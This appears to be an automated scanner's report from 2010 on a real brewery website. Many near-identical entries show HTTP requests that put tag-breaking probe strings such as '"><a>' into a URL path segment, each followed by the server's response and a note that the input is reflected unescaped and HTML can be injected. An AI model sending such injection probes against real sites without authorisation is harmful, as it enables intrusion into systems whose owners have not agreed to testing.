GET /facebookbb2eb"><a>bc8073585ab/content/img/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:56 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5800a"><a>a4b4f8152dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook5800a"><a>a4b4f8152dc/content/img/skin/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8d20"><a>cbd38bfb8dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf8d20"><a>cbd38bfb8dd/content/img/skin/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8c"><a>4b90a1eb6c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookacc8c"><a>4b90a1eb6c3/content/img/skin/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6775"><a>0b1efea915c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookc6775"><a>0b1efea915c/content/img/skin/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:05 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1f9"><a>3337eb96f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook2b1f9"><a>3337eb96f99/content/img/skin/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41c9"><a>38407733516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooke41c9"><a>38407733516/content/img/skin/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:07 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3d15"><a>6e87c3abe92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf3d15"><a>6e87c3abe92/content/img/skin/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1184"><a>83d2b21934b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooka1184"><a>83d2b21934b/content/img/skin/ninkasi-random/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0479"><a>259ace437e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookc0479"><a>259ace437e4/content/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:06 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72d"><a>662f9a27440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook3d72d"><a>662f9a27440/content/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fbed"><a>b1ab901368a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook7fbed"><a>b1ab901368a/content/img/skin/ninkasi-random/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bee"><a>7966f95bbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook14bee"><a>7966f95bbb5/content/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:15 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af568"><a>e655369a8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookaf568"><a>e655369a8f7/content/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcab8"><a>b4e49b085cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookbcab8"><a>b4e49b085cc/content/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:18 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><a>92edcf6844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf5e7b"><a>92edcf6844e/content/js/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:03 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd76"><a>cf3d86cfba9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookccd76"><a>cf3d86cfba9/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:07 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c86"><a>90405adf417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooke4c86"><a>90405adf417/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:07 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd20"><a>8eded1a6aaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook7bd20"><a>8eded1a6aaa/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f08d3"><a>32a16c21b89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf08d3"><a>32a16c21b89/content/js/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694a2"><a>600e3070e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook694a2"><a>600e3070e71/content/js/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d13"><a>4dcbedf8a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooka9d13"><a>4dcbedf8a30/content/js/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:22 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ea"><a>bca6b40fe7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook2d5ea"><a>bca6b40fe7b/content/js/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:23 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90ee5"><a>3e6417b9771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
